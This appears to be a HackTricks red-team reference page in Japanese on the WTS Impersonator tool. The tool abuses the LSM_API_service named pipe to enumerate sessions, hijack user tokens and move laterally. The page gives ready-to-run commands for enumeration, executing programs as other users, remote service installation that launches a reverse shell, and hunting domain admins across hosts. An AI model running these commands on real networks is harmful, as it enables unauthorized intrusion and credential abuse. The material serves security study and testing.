tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
WTS Impersonatorツールは、"\pipe\LSM_API_service" RPCネームドパイプを利用して、ログインしているユーザーを密かに列挙し、トークンをハイジャックします。これにより、従来のトークンインパーソネーション技術を回避し、ネットワーク内でのシームレスな横移動が可能になります。この技術の革新は、Omri Basoに帰属し、彼の作業はGitHubでアクセス可能です。
コア機能
ツールは一連のAPI呼び出しを通じて動作します:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
キーモジュールと使用法
-
ユーザーの列挙: ツールを使用して、ローカルおよびリモートのユーザー列挙が可能で、いずれのシナリオにもコマンドを使用します。
-
ローカルで:
.\WTSImpersonator.exe -m enum
- リモートで、IPアドレスまたはホスト名を指定することによって:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
-
コマンドの実行:
exec
およびexec-remote
モジュールは、機能するために サービス コンテキストを必要とします。ローカル実行には、WTSImpersonator実行可能ファイルとコマンドが必要です。 -
ローカルコマンド実行の例:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- PsExec64.exeを使用してサービスコンテキストを取得できます:
.\PsExec64.exe -accepteula -s cmd.exe
-
リモートコマンド実行: PsExec.exeに似たリモートでサービスを作成およびインストールし、適切な権限で実行を可能にします。
-
リモート実行の例:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- ユーザーハンティングモジュール: 複数のマシンにわたって特定のユーザーをターゲットにし、彼らの資格情報の下でコードを実行します。これは、複数のシステムでローカル管理者権限を持つドメイン管理者をターゲットにするのに特に便利です。
- 使用例:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。